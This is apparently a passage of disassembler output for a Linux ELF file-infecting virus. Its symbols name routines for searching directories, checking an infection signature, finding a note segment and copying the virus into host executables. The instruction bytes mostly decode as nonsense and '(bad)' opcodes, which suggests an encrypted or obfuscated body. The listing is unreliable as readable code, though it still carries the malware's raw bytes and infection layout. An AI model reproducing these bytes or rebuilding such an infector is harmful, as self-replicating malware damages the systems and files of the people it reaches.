  4015d9:	be 63 6b 2a f1       	mov    $0xf12a6b63,%esi
  4015de:	31 bc 54 58 bd 34 24 	xor    %edi,0x2434bd58(%rsp,%rdx,2)
  4015e5:	5e                   	pop    %rsi

00000000004015e6 <virus_str_len.v_str_len_done>:
  4015e6:	c0                   	.byte 0xc0
  4015e7:	45                   	rex.RB

00000000004015e8 <virus_search_signature>:
  4015e8:	13 f8                	adc    %eax,%edi
  4015ea:	d6                   	(bad)
  4015eb:	44 83 13 79          	rex.R adcl $0x79,(%rbx)
  4015ef:	e9 60 a8 d8 78       	jmp    7918be54 <_end+0x78c81f84>
  4015f4:	37                   	(bad)
  4015f5:	26 70 17             	es jo  40160f <virus_search_signature.vss_loop+0xb>
  4015f8:	16                   	(bad)
  4015f9:	f0 d6                	lock (bad)
  4015fb:	dd eb                	fucomp %st(3)
  4015fd:	78 3c                	js     40163b <virus_search_signature.vss_found+0x4>
  4015ff:	f8                   	clc
  401600:	9b                   	fwait
  401601:	58                   	pop    %rax
  401602:	cb                   	lret
  401603:	ec                   	in     (%dx),%al

0000000000401604 <virus_search_signature.vss_loop>:
  401604:	19 8d 7d 19 f0 7c    	sbb    %ecx,0x7cf0197d(%rbp)
  40160a:	d8 a2 cf 22 f2 c9    	fsubs  -0x360ddd31(%rdx)
  401610:	20 76 a3             	and    %dh,-0x5d(%rsi)
  401613:	d2 19                	rcrb   %cl,(%rcx)
  401615:	8d                   	.byte 0x8d
  401616:	8d 19                	lea    (%rcx),%ebx
  401618:	30                   	.byte 0x30
  401619:	bc                   	.byte 0xbc

000000000040161a <virus_search_signature.vss_compare_loop>:
  40161a:	d8 a2 cf 5a b3 61    	fsubs  0x61b35acf(%rdx)
  401620:	3e 3a 7a 10          	ds cmp 0x10(%rdx),%bh
  401624:	2f                   	(bad)
  401625:	a1 0a 71 78 fc 31 43 	movabs 0x4ecb4331fc78710a,%eax
  40162c:	cb 4e 
  40162e:	75 1c                	jne    40164c <virus_search_signature.vss_done+0xa>
  401630:	25                   	.byte 0x25

0000000000401631 <virus_search_signature.vss_next>:
  401631:	d0 00                	rolb   $1,(%rax)
  401633:	cd 65                	int    $0x65
  401635:	9e                   	sahf
  401636:	54                   	push   %rsp

0000000000401637 <virus_search_signature.vss_found>:
  401637:	91                   	xchg   %eax,%ecx
  401638:	7c b2                	jl     4015ec <virus_search_signature+0x4>
  40163a:	9a                   	(bad)
  40163b:	6b                   	.byte 0x6b
  40163c:	89 ee                	mov    %ebp,%esi
  40163e:	6b                   	.byte 0x6b

000000000040163f <virus_search_signature.vss_not_found>:
  40163f:	01 e3                	add    %esp,%ebx
  401641:	1c                   	.byte 0x1c

0000000000401642 <virus_search_signature.vss_done>:
  401642:	98                   	cwtl
  401643:	38 89 cb d0 51 5b    	cmp    %cl,0x5b51d0cb(%rcx)
  401649:	f8                   	clc
  40164a:	d6                   	(bad)
  40164b:	0c 63                	or     $0x63,%al
  40164d:	af                   	scas   %es:(%rdi),%eax

000000000040164e <virus_list_and_infect>:
  40164e:	d9 01                	flds   (%rcx)
  401650:	26 35 00 3e 1c c5    	es xor $0xc51c3e00,%eax
  401656:	ba 5b b9 b0 38       	mov    $0x38b0b95b,%edx
  40165b:	61                   	(bad)
  40165c:	23 bb c1 d9 20 56    	and    0x5620d9c1(%rbx),%edi
  401662:	a5                   	movsl  %ds:(%rsi),%es:(%rdi)
  401663:	78 37                	js     40169c <virus_list_and_infect.vl_read_loop+0x4>
  401665:	6e                   	outsb  %ds:(%rsi),(%dx)
  401666:	70 17                	jo     40167f <virus_list_and_infect+0x31>
  401668:	0f d8 d6             	psubusb %mm6,%mm2
  40166b:	54                   	push   %rsp
  40166c:	ce                   	(bad)
  40166d:	92                   	xchg   %eax,%edx
  40166e:	8c bc 95 58 0e 18 bc 	mov    %?,-0x43e7f1a8(%rbp,%rdx,4)
  401675:	04 32                	add    $0x32,%al
  401677:	53                   	push   %rbx
  401678:	b9 ba 67 8f 76       	mov    $0x768f67ba,%ecx
  40167d:	4e 8c 21             	rex.WRX mov %fs,(%rcx)
  401680:	26 2d 97 32 7b c9    	es sub $0xc97b3297,%eax
  401686:	3a 71 30             	cmp    0x30(%rcx),%dh
  401689:	2c e2                	sub    $0xe2,%al
  40168b:	43 cb                	rex.XB lret
  40168d:	9d                   	popf
  40168e:	75 3b                	jne    4016cb <virus_list_and_infect.vl_process_entry+0x9>
  401690:	2e 97                	cs xchg %eax,%edi
  401692:	42 32 7b 83          	rex.X xor -0x7d(%rbx),%dil
  401696:	76 45                	jbe    4016dd <virus_list_and_infect.vl_process_entry+0x1b>

0000000000401698 <virus_list_and_infect.vl_read_loop>:
  401698:	7c 74                	jl     40170e <virus_list_and_infect.vl_not_dot+0x11>
  40169a:	9a                   	(bad)
  40169b:	6b 89 fd 8d 01 06 b7 	imul   $0xffffffb7,0x6018dfd(%rcx),%ecx
  4016a2:	46                   	rex.RX
  4016a3:	4d 84 3e             	rex.WRB test %r15b,(%r14)
  4016a6:	ef                   	out    %eax,(%dx)
  4016a7:	5b                   	pop    %rbx
  4016a8:	39 ba 9a 13 a1 f3    	cmp    %edi,-0xc5eec66(%rdx)
  4016ae:	5f                   	pop    %rdi
  4016af:	45 12 6e 7e          	adc    0x7e(%r14),%r13b
  4016b3:	32 7b c1             	xor    -0x3f(%rbx),%bh
  4016b6:	78 17                	js     4016cf <virus_list_and_infect.vl_process_entry+0xd>
  4016b8:	93                   	xchg   %eax,%ebx
  4016b9:	3d d8 55 a3 f6       	cmp    $0xf6a355d8,%eax
  4016be:	73 43                	jae    401703 <virus_list_and_infect.vl_not_dot+0x6>
  4016c0:	6a 1a                	push   $0x1a

00000000004016c2 <virus_list_and_infect.vl_process_entry>:
  4016c2:	00 6e 51             	add    %ch,0x51(%rsi)
  4016c5:	86 78 82             	xchg   %bh,-0x7e(%rax)
  4016c8:	93                   	xchg   %eax,%ebx
  4016c9:	3d 71 0d cb dd       	cmp    $0xddcb0d71,%eax
  4016ce:	9e                   	sahf
  4016cf:	47 15 e5 bd 70 73    	rex.RXB adc $0x7370bde5,%eax
  4016d5:	ff 42 e6             	incl   -0x1a(%rdx)
  4016d8:	c3                   	ret
  4016d9:	3a d8                	cmp    %al,%bl
  4016db:	27                   	(bad)
  4016dc:	e3 b6                	jrcxz  401694 <virus_list_and_infect+0x46>
  4016de:	0b f6                	or     %esi,%esi
  4016e0:	50                   	push   %rax
  4016e1:	8a 00                	mov    (%rax),%al
  4016e3:	5e                   	pop    %rsi
  4016e4:	c0 59 3e aa          	rcrb   $0xaa,0x3e(%rcx)
  4016e8:	c8 11 0a 6f          	enter  $0xa11,$0x6f
  4016ec:	7a b9                	jp     4016a7 <virus_list_and_infect.vl_read_loop+0xf>
  4016ee:	73 e0                	jae    4016d0 <virus_list_and_infect.vl_process_entry+0xe>
  4016f0:	9b                   	fwait
  4016f1:	1e                   	(bad)
  4016f2:	b1 3a                	mov    $0x3a,%cl
  4016f4:	0a 6a 0a             	or     0xa(%rdx),%ch
  4016f7:	5f                   	pop    %rdi
  4016f8:	4a aa                	rex.WX stos %al,%es:(%rdi)
  4016fa:	9a                   	(bad)
  4016fb:	c8                   	.byte 0xc8
  4016fc:	18                   	.byte 0x18

00000000004016fd <virus_list_and_infect.vl_not_dot>:
  4016fd:	50                   	push   %rax
  4016fe:	33 e8                	xor    %eax,%ebp
  401700:	1b 78 0e             	sbb    0xe(%rax),%edi
  401703:	0d 39 9d 10 9c       	or     $0x9c109d39,%eax
  401708:	fb                   	sti
  401709:	b2 a4                	mov    $0xa4,%dl
  40170b:	6f                   	outsl  %ds:(%rsi),(%dx)
  40170c:	72 4e                	jb     40175c <virus_infect_elf+0x3>
  40170e:	0a e0                	or     %al,%ah
  401710:	5a                   	pop    %rdx
  401711:	2c 7a                	sub    $0x7a,%al
  401713:	4b 39 3e             	rex.WXB cmp %rdi,(%r14)
  401716:	04                   	.byte 0x4

0000000000401717 <virus_list_and_infect.vl_no_slash>:
  401717:	e1 fe                	loope  401717 <virus_list_and_infect.vl_no_slash>
  401719:	c7                   	(bad)
  40171a:	6d                   	insl   (%dx),%es:(%rdi)
  40171b:	94                   	xchg   %eax,%esp
  40171c:	76 4b                	jbe    401769 <virus_infect_elf+0x10>
  40171e:	11 0f                	adc    %ecx,(%rdi)
  401720:	55                   	push   %rbp
  401721:	5d                   	pop    %rbp
  401722:	db 32                	(bad)  (%rdx)
  401724:	7b c1                	jnp    4016e7 <virus_list_and_infect.vl_process_entry+0x25>
  401726:	78 07                	js     40172f <virus_list_and_infect.vl_next_entry>
  401728:	93                   	xchg   %eax,%ebx
  401729:	7d 90                	jge    4016bb <virus_list_and_infect.vl_read_loop+0x23>
  40172b:	5d                   	pop    %rbp
  40172c:	a9                   	.byte 0xa9
  40172d:	91                   	xchg   %eax,%ecx
  40172e:	73                   	.byte 0x73

000000000040172f <virus_list_and_infect.vl_next_entry>:
  40172f:	01 36                	add    %esi,(%rsi)
  401731:	30 05 70 63 eb 3d    	xor    %al,0x3deb6370(%rip)        # 3e2b7aa7 <_end+0x3ddadbd7>
  401737:	19 f5                	sbb    %esi,%ebp
  401739:	90                   	nop
  40173a:	dd                   	.byte 0xdd
  40173b:	34 a5                	xor    $0xa5,%al

000000000040173d <virus_list_and_infect.vl_close_dir>:
  40173d:	74 6b                	je     4017aa <virus_infect_elf+0x51>
  40173f:	43 6a 1a             	rex.XB push $0x1a
  401742:	0e                   	(bad)
  401743:	cc                   	int3
  401744:	03 e9                	add    %ecx,%ebp

0000000000401746 <virus_list_and_infect.vl_done>:
  401746:	e0 51                	loopne 401799 <virus_infect_elf+0x40>
  401748:	4b b0 70             	rex.WXB mov $0x70,%r8b
  40174b:	61                   	(bad)
  40174c:	6b f3 7f             	imul   $0x7f,%ebx,%esi
  40174f:	65 6e                	outsb  %gs:(%rsi),(%dx)
  401751:	9a                   	(bad)
  401752:	42 32 39             	rex.X xor (%rcx),%dil
  401755:	8d 5d b1             	lea    -0x4f(%rbp),%ebx
  401758:	a7                   	cmpsl  %es:(%rdi),%ds:(%rsi)

0000000000401759 <virus_infect_elf>:
  401759:	10 d8                	adc    %bl,%al
  40175b:	27                   	(bad)
  40175c:	a6                   	cmpsb  %es:(%rdi),%ds:(%rsi)
  40175d:	f3 7f 24             	repz jg 401784 <virus_infect_elf+0x2b>
  401760:	6e                   	outsb  %ds:(%rsi),(%dx)
  401761:	9a                   	(bad)
  401762:	42 32 71 63          	rex.X xor 0x63(%rcx),%sil
  401766:	30 f1                	xor    %dh,%cl
  401768:	b3 08                	mov    $0x8,%bl
  40176a:	00 21                	add    %ah,(%rcx)
  40176c:	c5 56 b6             	(bad)
  40176f:	4b 62 1a 42 cf 9f    	(bad)
  401775:	3e c5 a4 db          	(bad)
  401779:	f6 ad be 99 b1 73    	imulb  0x73b199be(%rbp)
  40177f:	43                   	rex.XB
  401780:	40 93                	rex xchg %eax,%ebx
  401782:	d4                   	(bad)
  401783:	4a 53                	rex.WX push %rbx
  401785:	83 16 5d             	adcl   $0x5d,(%rsi)
  401788:	c1 fe 57             	sar    $0x57,%esi
  40178b:	73 89                	jae    401716 <virus_list_and_infect.vl_not_dot+0x19>
  40178d:	b1 39                	mov    $0x39,%cl
  40178f:	0f 44 df             	cmove  %edi,%ebx
  401792:	02 32                	add    (%rdx),%dh
  401794:	7b c1                	jnp    401757 <virus_list_and_infect.vl_done+0x11>
  401796:	18 17                	sbb    %dl,(%rdi)
  401798:	c6                   	(bad)
  401799:	33 2d be 99 b1 73    	xor    0x73b199be(%rip),%ebp        # 73f1b15d <_end+0x73a1128d>
  40179f:	43 12 32             	rex.XB adc (%r10),%sil
  4017a2:	00 1e                	add    %bl,(%rsi)
  4017a4:	7d b9                	jge    40175f <virus_infect_elf+0x6>
  4017a6:	7e cf                	jle    401777 <virus_infect_elf+0x1e>
  4017a8:	a1 ba 9a 29 c5 9b b4 	movabs 0x2a86b49bc5299aba,%eax
  4017af:	86 2a 
  4017b1:	1a 42 32             	sbb    0x32(%rdx),%al
  4017b4:	59                   	pop    %rcx
  4017b5:	8d 45 d2             	lea    -0x2e(%rbp),%eax
  4017b8:	0e                   	(bad)
  4017b9:	33 0c 13             	xor    (%rbx,%rdx,1),%ecx
  4017bc:	a1 74 73 43 6a 1a 60 	movabs 0x47e601a6a437374,%eax
  4017c3:	7e 04 
  4017c5:	83 56 f0 3d          	adcl   $0x3d,-0x10(%rsi)
  4017c9:	6f                   	outsl  %ds:(%rsi),(%dx)
  4017ca:	98                   	cwtl
  4017cb:	6b 89 b1 0b 6b 28 06 	imul   $0x6,0x286b0bb1(%rcx),%ecx
  4017d2:	85 30                	test   %esi,(%rax)
  4017d4:	03 a5 ef 4b b9 ba    	add    -0x4546b411(%rbp),%esp
  4017da:	d8 07                	fadds  (%rdi)
  4017dc:	62 35 7f ba 91       	(bad)  {%k2}{z}
  4017e1:	30 20                	xor    %ah,(%rax)
  4017e3:	00 03                	add    %al,(%rbx)
  4017e5:	ed                   	in     (%dx),%eax
  4017e6:	6f                   	outsl  %ds:(%rsi),(%dx)
  4017e7:	4b b9 ba 9e 90 a9 a1 	rex.WXB movabs $0x6f6f0ba1a9909eba,%r9
  4017ee:	0b 6f 6f 
  4017f1:	0a 42 32             	or     0x32(%rdx),%al
  4017f4:	03 7c 00 db          	add    -0x25(%rax,%rax,1),%edi
  4017f8:	8a a6 5d 7b 2a e1    	mov    -0x1ed584a3(%rsi),%ah
  4017fe:	40 5f                	rex pop %rdi
  401800:	ad                   	lods   %ds:(%rsi),%eax
  401801:	02 3a                	add    (%rdx),%bh
  401803:	1e                   	(bad)
  401804:	1f                   	(bad)
  401805:	d1 3a                	sarl   $1,(%rdx)
  401807:	5b                   	pop    %rbx

0000000000401808 <virus_infect_elf.vi_valid_elf_type>:
  401808:	db f6                	fcomi  %st(6),%st
  40180a:	71 ed                	jno    4017f9 <virus_infect_elf+0xa0>
  40180c:	4c f1                	rex.WR int1
  40180e:	73 43                	jae    401853 <virus_infect_elf.vi_sig_check_loop+0x32>
  401810:	6a 38                	push   $0x38
  401812:	0e                   	(bad)
  401813:	4d                   	rex.WRB
  401814:	f2 76 b3             	bnd jbe 4017ca <virus_infect_elf+0x71>
  401817:	cd c1                	int    $0xc1
  401819:	92                   	xchg   %eax,%edx
  40181a:	d8 e2                	fsub   %st(2),%st
  40181c:	57                   	push   %rdi
  40181d:	d3 2f                	shrl   %cl,(%rdi)
  40181f:	e8                   	.byte 0xe8
  401820:	ad                   	lods   %ds:(%rsi),%eax

0000000000401821 <virus_infect_elf.vi_sig_check_loop>:
  401821:	df 42 32             	filds  0x32(%rdx)
  401824:	7b c1                	jnp    4017e7 <virus_infect_elf+0x8e>
  401826:	18 17                	sbb    %dl,(%rdi)
  401828:	c6 f8 f6             	xabort $0xf6
  40182b:	c6                   	(bad)
  40182c:	8d                   	lea    (bad),%ecx
  40182d:	ce                   	(bad)
  40182e:	8c bc bf 1a c2 32 7b 	mov    %?,0x7b32c21a(%rdi,%rdi,4)
  401835:	b9 12 19 95 bc       	mov    $0xbc951912,%ecx
  40183a:	69 81 0b d3 2f a8 ec 	imul   $0xdf2e58ec,-0x57d02cf5(%rcx),%eax
  401841:	58 2e df 
  401844:	7f be                	jg     401804 <virus_infect_elf+0xab>
  401846:	c5 a4 fb             	(bad)
  401849:	f6 ac 21 e5 0d ed 4b 	imulb  0x4bed0de5(%rcx,%riz,1)
  401850:	6a 1a                	push   $0x1a
  401852:	8f                   	(bad)
  401853:	a3 7b c1 3a 1c dd 55 	movabs %eax,0x946555dd1c3ac17b
  40185a:	65 94 
  40185c:	43                   	rex.XB
  40185d:	f3 5f                	repz pop %rdi
  40185f:	45 c1 6b 00 3a       	rex.RB shrl $0x3a,0x0(%r11)
  401864:	25 a3 f3 c4 52       	and    $0x52c4f3a3,%eax
  401869:	c3                   	ret
  40186a:	d8 27                	fsubs  (%rdi)
  40186c:	7f f3                	jg     401861 <virus_infect_elf.vi_sig_check_loop+0x40>
  40186e:	6f                   	outsl  %ds:(%rsi),(%dx)
  40186f:	34 fb                	xor    $0xfb,%al
  401871:	58                   	pop    %rax
  401872:	5e                   	pop    %rsi
  401873:	04 73                	add    $0x73,%al
  401875:	83 16 ec             	adcl   $0xffffffec,(%rsi)
  401878:	7a 42                	jp     4018bc <virus_infect_elf.vi_sig_check_done+0x23>
  40187a:	5f                   	pop    %rdi
  40187b:	2b 89 b1 73 61 26    	sub    0x266173b1(%rcx),%ecx
  401881:	65 cb                	gs lret
  401883:	a4                   	movsb  %ds:(%rsi),%es:(%rdi)
  401884:	03 e9                	add    %ecx,%ebp
  401886:	78 77                	js     4018ff <virus_infect_elf.vi_sig_check_done+0x66>
  401888:	bf 79 ea 29 c5       	mov    $0xc529ea79,%edi
  40188d:	af                   	scas   %es:(%rdi),%eax
  40188e:	2c cf                	sub    $0xcf,%al

0000000000401890 <virus_infect_elf.vi_already_infected>:
  401890:	08 46 a9             	or     %al,-0x57(%rsi)
  401893:	b4 34                	mov    $0x34,%ah
  401895:	e4 2a                	in     $0x2a,%al
  401897:	5b                   	pop    %rbx
  401898:	b9                   	.byte 0xb9

0000000000401899 <virus_infect_elf.vi_sig_check_done>:
  401899:	d8 c6                	fadd   %st(6),%st
  40189b:	80 0f 74             	orb    $0x74,(%rdi)
  40189e:	33 43 6a             	xor    0x6a(%rbx),%eax
  4018a1:	1a 60 7e             	sbb    0x7e(%rax),%ah
  4018a4:	04 48                	add    $0x48,%al
  4018a6:	8d                   	lea    (bad),%edx
  4018a7:	d2 2f                	shrb   %cl,(%rdi)
  4018a9:	c2 b2 ae             	ret    $0xaeb2
  4018ac:	89 b1 73 43 48 56    	mov    %esi,0x56484373(%rcx)
  4018b2:	3d 70 17 6a be       	cmp    $0xbe6a1770,%eax
  4018b7:	8e bb ba 9a 6b f1    	mov    -0xe946546(%rbx),%?
  4018bd:	99                   	cltd
  4018be:	31 2f                	xor    %ebp,(%rdi)
  4018c0:	81 9e 00 6e 41 01 78 	sbbl   $0x3d931778,0x1416e00(%rsi)
  4018c7:	17 93 3d 
  4018ca:	f8                   	clc
  4018cb:	37                   	(bad)
  4018cc:	32 b0 0b fe 50 ab    	xor    -0x54af01f5(%rax),%dh
  4018d2:	00 7e 51             	add    %bh,0x51(%rsi)
  4018d5:	c6 42 e6 83          	movb   $0x83,-0x1a(%rdx)
  4018d9:	7b d8                	jnp    4018b3 <virus_infect_elf.vi_sig_check_done+0x1a>
  4018db:	27                   	(bad)
  4018dc:	a3 77 b6 03 6a 1a 42 	movabs %eax,0x3710421a6a03b677
  4018e3:	10 37 
  4018e5:	be 58 17 0e 33       	mov    $0x330e1758,%esi
  4018ea:	0c 13                	or     $0x13,%al
  4018ec:	a1 f3 2f 69 ac 58 3a 	movabs 0x514f3a58ac692ff3,%eax
  4018f3:	4f 51 
  4018f5:	c6 78                	xabort $0x78,(bad)
  4018f7:	17                   	(bad)
  4018f8:	af                   	scas   %es:(%rdi),%eax
  4018f9:	7f 9a                	jg     401895 <virus_infect_elf.vi_already_infected+0x5>
  4018fb:	6b 89 b1 51 0f 15 58 	imul   $0x58,0x150f51b1(%rcx),%ecx
  401902:	2e 9f                	cs lahf
  401904:	7f be                	jg     4018c4 <virus_infect_elf.vi_sig_check_done+0x2b>
  401906:	c5 a4 c1             	(bad)
  401909:	92                   	xchg   %eax,%edx
  40190a:	d8 07                	fadds  (%rdi)
  40190c:	64 b5 0c             	fs mov $0xc,%ch
  40190f:	bc 95 58 cb 7c       	mov    $0x7ccb5895,%esp
  401914:	39                   	.byte 0x39
  401915:	9d                   	popf
  401916:	10                   	.byte 0x10
  401917:	9d                   	popf

0000000000401918 <virus_infect_elf.vi_find_note>:
  401918:	fb                   	sti
  401919:	73 94                	jae    4018af <virus_infect_elf.vi_sig_check_done+0x16>
  40191b:	13 e5                	adc    %ebp,%esp
  40191d:	51                   	push   %rcx
  40191e:	63 43 6a             	movsxd 0x6a(%rbx),%eax
  401921:	58                   	pop    %rax
  401922:	0e                   	(bad)
  401923:	64 39 b9 47 f1 be f8 	cmp    %edi,%fs:-0x7410eb9(%rcx)
  40192a:	f6 ca 31             	test   $0x31,%dl
  40192d:	ad                   	lods   %ds:(%rsi),%eax
  40192e:	82                   	(bad)
  40192f:	63 c9                	movsxd %ecx,%ecx
  401931:	32 00                	xor    (%rax),%al
  401933:	cd 75                	int    $0x75
  401935:	9e                   	sahf
  401936:	35                   	.byte 0x35

0000000000401937 <virus_infect_elf.vi_found_note>:
  401937:	e9 fb d6 77 6f       	jmp    6fb7f037 <_end+0x6f675167>
  40193c:	f6 4e 8c 01          	testb  $0x1,-0x74(%rsi)
  401940:	e3 54                	jrcxz  401996 <virus_infect_elf.vi_found_max_vaddr+0x22>
  401942:	28 bb 7d 83 66 71    	sub    %bh,0x7166837d(%rbx)
  401948:	7f                   	.byte 0x7f

0000000000401949 <virus_infect_elf.vi_find_max_vaddr>:
  401949:	f8                   	clc
  40194a:	53                   	push   %rbx
  40194b:	65 62                	gs (bad)
  40194d:	80 31 0f             	xorb   $0xf,(%rcx)
  401950:	3c 58                	cmp    $0x58,%al
  401952:	3a 4f d1             	cmp    -0x2f(%rdi),%cl
  401955:	c6 78                	xabort $0x78,(bad)
  401957:	37                   	(bad)
  401958:	18 02                	sbb    %al,(%rdx)
  40195a:	86 9a 81 1a f3 21    	xchg   %bl,0x21f31a81(%rdx)
  401960:	36 68 c2 50 63 b3    	ss push $0xffffffffb36350c2
  401966:	7b 31                	jnp    401999 <virus_infect_elf.vi_found_max_vaddr+0x25>
  401968:	70 b4                	jo     40191e <virus_infect_elf.vi_find_note+0x6>
  40196a:	69                   	.byte 0x69
  40196b:	73 e3                	jae    401950 <virus_infect_elf.vi_find_max_vaddr+0x7>
  40196d:	fd                   	std
  40196e:	35                   	.byte 0x35

000000000040196f <virus_infect_elf.vi_next_phdr>:
  40196f:	01                   	.byte 0x1
  401970:	95                   	xchg   %eax,%ebp
  401971:	14 1d                	adc    $0x1d,%al
  401973:	9c                   	pushf

0000000000401974 <virus_infect_elf.vi_found_max_vaddr>:
  401974:	39 9d 10 9c f3 f6    	cmp    %ebx,-0x90c63f0(%rbp)
  40197a:	94                   	xchg   %eax,%esp
  40197b:	29 a0 4e 0b 43 6a    	sub    %esp,0x6a430b4e(%rax)
  401981:	50                   	push   %rax
  401982:	4e 34 84             	rex.WRX xor $0x84,%al
  401985:	b9 3a 5b f3 b6       	mov    $0xb6f35b3a,%ecx
  40198a:	9d                   	popf
  40198b:	6b 0e 4e             	imul   $0x4e,(%rsi),%ecx
  40198e:	8c 09                	mov    %cs,(%rcx)
  401990:	62 1c b0             	(bad)  {%k4}
  401993:	0c 4b                	or     $0x4b,%al
  401995:	c9                   	leave
  401996:	3a 5b b9             	cmp    -0x47(%rbx),%bl
  401999:	84 a8 4b b1 b1 73    	test   %ch,0x73b1b14b(%rax)
  40199f:	43 08 56 30          	rex.XB or %dl,0x30(%r14)
  4019a3:	72 19                	jb     4019be <virus_infect_elf.vi_found_max_vaddr+0x4a>
  4019a5:	8d 08                	lea    (%rax),%ecx
  4019a7:	db db                	fcmovnu %st(3),%st
  4019a9:	f6 a8 ab eb fd 59    	imulb  0x59fdebab(%rax)
  4019af:	04 af                	add    $0xaf,%al
  4019b1:	be 7a 32 7b 83       	mov    $0x837b327a,%esi
  4019b6:	76 69                	jbe    401a21 <virus_infect_elf.vi_found_max_vaddr+0xad>
  4019b8:	b8 f8 d6 59 c8       	mov    $0xc859d6f8,%eax
  4019bd:	f3 4d 71 eb          	repz rex.WRB jno 4019ac <virus_infect_elf.vi_found_max_vaddr+0x38>
  4019c1:	1a c2                	sbb    %dl,%al
  4019c3:	32 7b 04             	xor    0x4(%rbx),%bh
  4019c6:	7a 5b                	jp     401a23 <virus_infect_elf.vi_found_max_vaddr+0xaf>
  4019c8:	b9 ba b8 27 f6       	mov    $0xf627b8ba,%ecx
  4019cd:	d3 3f                	sarl   %cl,(%rdi)
  4019cf:	f4                   	hlt
  4019d0:	e3 8c                	jrcxz  40195e <virus_infect_elf.vi_find_max_vaddr+0x15>
  4019d2:	3a 1a                	cmp    (%rdx),%bl
  4019d4:	39 9d 10 9d fb c2    	cmp    %ebx,-0x3d0462f0(%rbp)
  4019da:	e7 41                	out    %eax,$0x41
  4019dc:	8e f3                	mov    %ebx,%?
  4019de:	3f                   	(bad)
  4019df:	55                   	push   %rbp
  4019e0:	af                   	scas   %es:(%rdi),%eax
  4019e1:	12 42 32             	adc    0x32(%rdx),%al
  4019e4:	7b e3                	jnp    4019c9 <virus_infect_elf.vi_found_max_vaddr+0x55>
  4019e6:	76 24                	jbe    401a0c <virus_infect_elf.vi_found_max_vaddr+0x98>
  4019e8:	fb                   	sti
  4019e9:	d6                   	(bad)
  4019ea:	37                   	(bad)
  4019eb:	6f                   	outsl  %ds:(%rsi),(%dx)
  4019ec:	f6 4e 8c 3b          	testb  $0x3b,-0x74(%rsi)
  4019f0:	42 58                	rex.X pop %rax
  4019f2:	1e                   	(bad)
  4019f3:	18 3c 83             	sbb    %bh,(%rbx,%rax,4)
  4019f6:	26 5d                	es pop %rbp
  4019f8:	71 f8                	jno    4019f2 <virus_infect_elf.vi_found_max_vaddr+0x7e>
  4019fa:	f6 80 0d f3 3f 79 aa 	testb  $0xaa,0x793ff30d(%rax)
  401a01:	df 02                	filds  (%rdx)
  401a03:	32 7b c1             	xor    -0x3f(%rbx),%bh
  401a06:	18 17                	sbb    %dl,(%rdi)
  401a08:	c6                   	(bad)
  401a09:	33 2d e2 1f c9 5b    	xor    0x5bc91fe2(%rip),%ebp        # 5c0939f1 <_end+0x5bb89b21>
  401a0f:	86 62 1a             	xchg   %ah,0x1a(%rdx)
  401a12:	42 32 59 8d          	rex.X xor -0x73(%rcx),%bl
  401a16:	45 19 d5             	sbb    %r10d,%r13d
  401a19:	11 1e                	adc    %ebx,(%rsi)
  401a1b:	be 8b b1 73 43       	mov    $0x4373b18b,%esi
  401a20:	12 32                	adc    (%rdx),%dh
  401a22:	00 5e 96             	add    %bl,-0x6a(%rsi)
  401a25:	c5 45 a4             	(bad)
  401a28:	46 d8 d6             	rex.RX fcom %st(6)
  401a2b:	9c                   	pushf
  401a2c:	44                   	rex.R
  401a2d:	15                   	.byte 0x15
  401a2e:	4b                   	rex.WXB
  401a2f:	43                   	rex.XB
  401a30:	6a                   	.byte 0x6a

0000000000401a31 <virus_infect_elf.vi_copy_virus>:
  401a31:	58                   	pop    %rax
  401a32:	6e                   	outsb  %ds:(%rsi),(%dx)
  401a33:	7c d8                	jl     401a0d <virus_infect_elf.vi_found_max_vaddr+0x99>
  401a35:	b9 6e 6b fd 82       	mov    $0x82fd6b6e,%ecx
  401a3a:	d8 94 bf f3 8c 7d 28 	fcoms  0x287d8cf3(%rdi,%rdi,4)
  401a41:	e5 0c                	in     $0xc,%eax
  401a43:	6d                   	insl   (%dx),%es:(%rdi)
  401a44:	1c                   	.byte 0x1c

0000000000401a45 <virus_infect_elf.vi_copy_done>:
  401a45:	83 56 b6 bd          	adcl   $0xffffffbd,-0x4a(%rsi)
  401a49:	c5 65 94             	(bad)
  401a4c:	cb                   	lret
  401a4d:	ed                   	in     (%dx),%eax
  401a4e:	59                   	pop    %rcx
  401a4f:	c4                   	(bad)
  401a50:	28 46 28             	sub    %al,0x28(%rsi)
  401a53:	75 39                	jne    401a8e <virus_infect_elf.vi_copy_done+0x49>
  401a55:	dd 34 93             	fnsave (%rbx,%rdx,4)
  401a58:	fb                   	sti
  401a59:	f3 dc 29             	repz fsubrl (%rcx)
  401a5c:	c5 89 b6             	(bad)
  401a5f:	03 6a 1a             	add    0x1a(%rdx),%ebp
  401a62:	42 10 37             	rex.X adc %sil,(%rdi)
  401a65:	be b3 ec 6c aa       	mov    $0xaa6cecb3,%esi
  401a6a:	9a                   	(bad)
  401a6b:	6b 89 c9 5b 86 62 1a 	imul   $0x1a,0x62865bc9(%rcx),%ecx
  401a72:	42 32 59 8d          	rex.X xor -0x73(%rcx),%bl
  401a76:	45 19 d5             	sbb    %r10d,%r13d
  401a79:	17                   	(bad)
  401a7a:	9e                   	sahf
  401a7b:	14 76                	adc    $0x76,%al
  401a7d:	4e a6                	rex.WRX cmpsb %es:(%rdi),%ds:(%rsi)
  401a7f:	e7 52                	out    %eax,$0x52
  401a81:	1a 42 4a             	sbb    0x4a(%rdx),%al
  401a84:	53                   	push   %rbx
  401a85:	04 22                	add    $0x22,%al
  401a87:	5b                   	pop    %rbx
  401a88:	b9 ba b8 27 f6       	mov    $0xf627b8ba,%ecx
  401a8d:	c9                   	leave
  401a8e:	5b                   	pop    %rbx
  401a8f:	0c f7                	or     $0xf7,%al
  401a91:	1a 42 32             	sbb    0x32(%rdx),%al

0000000000401a94 <virus_infect_elf.vi_handle_non_elf>:
  401a94:	be 81 3a 5b b9       	mov    $0xb95b3a81,%esi
  401a99:	98                   	cwtl
  401a9a:	d6                   	(bad)
  401a9b:	14 00                	adc    $0x0,%al
  401a9d:	06                   	(bad)
  401a9e:	fa                   	cli
  401a9f:	d5 12 32 00          	{rex2 0x12} xor (%r16),%al
  401aa3:	bb a5 a3 66 f0       	mov    $0xf066a3a5,%ebx
  401aa8:	7e                   	.byte 0x7e

0000000000401aa9 <virus_infect_elf.vi_non_elf_sig_loop>:
  401aa9:	7f 9a                	jg     401a45 <virus_infect_elf.vi_copy_done>
  401aab:	6b 89 b1 51 0f 15 58 	imul   $0x58,0x150f51b1(%rcx),%ecx
  401ab2:	2e 9f                	cs lahf
  401ab4:	7f be                	jg     401a74 <virus_infect_elf.vi_copy_done+0x2f>
  401ab6:	c5 a4 6c             	(bad)
